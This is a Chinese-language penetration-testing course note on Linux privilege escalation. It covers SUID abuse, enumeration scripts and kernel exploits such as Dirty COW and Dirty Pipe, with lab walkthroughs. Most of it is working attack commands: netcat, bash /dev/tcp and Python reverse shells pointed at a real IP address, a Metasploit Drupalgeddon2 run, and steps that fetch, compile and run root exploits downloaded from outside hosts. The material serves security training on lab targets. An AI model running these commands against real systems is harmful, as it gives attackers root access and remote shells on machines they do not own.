第103天：权限提升-Linux系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID

知识点梳理

#知识点：
1、Linux提权辅助项目-探针&漏扫
2、Linux提权-配置SUID&内核CVE

#系列内容：
内核，数据库，第三方服务，SUID&GUID，定时任务，环境变量，SUDO，权限不当等
脏牛漏洞(CVE-2016-5195)
Dirty Pipe(CVE-2022-0847)
SUDO(CVE-2021-3156）
Polkit(CVE-2021-4034)

案例演示

Linux-辅助项目配置安全&内核漏洞-探针漏扫

Linux-配置安全SUID提权探针&利用-云服务器

Linux-内核漏洞本地用户提权-探针&利用-墨者

Linux-内核漏洞Web用户提权-探针&利用-脏牛

Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe

#Linux-辅助项目配置安全&内核漏洞-探针&漏扫
https://github.com/liamg/traitor
https://github.com/AlessandroZ/BeRoot
https://github.com/rebootuser/LinEnum
https://github.com/mzet-/linux-exploit-suggester
https://github.com/sleventyeleven/linuxprivchecker
https://github.com/jondonas/linux-exploit-suggester-2

一个综合类探针：traitor
一个自动化提权：BeRoot(gtfobins&lolbas)
两个信息收集：LinEnum linuxprivchecker
两个漏洞探针：linux-exploit-suggester&2

二进制文件提权查询：
Linux：https://gtfobins.github.io/
Windows：https://lolbas-project.github.io/

#Linux-配置安全SUID提权-探针&利用-云服务器
SUID概念：当一个可执行文件被设置了SUID权限后，当普通用户执行时，该程序将以文件所有者（通常是root管理员）的权限运行。
漏洞成因：chmod u+s给予suid（删除suid使用u-s），
提权过程：探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG

手工命令探针安全：
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
（实测手工比脚本方便快捷）

脚本项目探针安全：
LinEnum.sh、traitor、linuxprivchecker
（实测LinEnum.sh不错，traitor不太行，linuxprivchecker一般，但需要打包上传且要对方有python编译器）

参考利用：
https://pentestlab.blog/2017/09/25/suid-executables/ （推荐）
https://gtfobins.github.io/

touch xiaodi
find xiaodi -exec whoami \;

利用NC正向反弹：
find xiaodi -exec netcat -lvp 5555 -e /bin/sh \;
netcat xx.xx.xx.xx 5555

利用NC反向反弹：
find xiaodi -exec bash -i >& /dev/tcp/ip/port 0>&1 \;
但首先需要在kali上使用nc监听端口：
nc -lvp 7777

利用Python反弹：
find xiaodi -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.94.236.117",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;
nc -lvp 7777

各种反弹Shell命令在线生成平台：
https://forum.ywhack.com/shell.php


#Linux-内核漏洞本地用户提权-探针&利用-Mozhe
提权过程：连接-获取可利用漏洞-下载或上传EXP-编译EXP-给权限执行-GG
探针项目：BeRoot、linux-exploit-suggester、linux-exploit-suggester2
（实测BeRoot需要python环境，linux-exploit-suggester还不错）
gcc 45010.c -o exp
chmod +x exp
./exp
id

#Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow
内核提权整个过程：（linux-exploit-suggester获取信息）
vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG
内核漏洞提权过程：寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)
nmap 192.168.46.0/24
nmap -p1-65535 192.168.46.144
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
meterpreter > upload /root/dcow.cpp /tmp/dcow.cpp
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'		//在交互式终端中生成一个更强大的 Bash shell
www-data@lampiao:/var/www/html$  cd /tmp
www-data@lampiao:/tmp$  g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
www-data@lampiao:/tmp$  ./dcow
www-data@lampiao:/tmp$  su root
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)
最后拿到root目录下的flag


#Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe
Dirty Pipe(CVE-2022-0847)
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
wget https://haxx.in/files/dirtypipez.c
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su  #任何具体suid权限的文件均可
id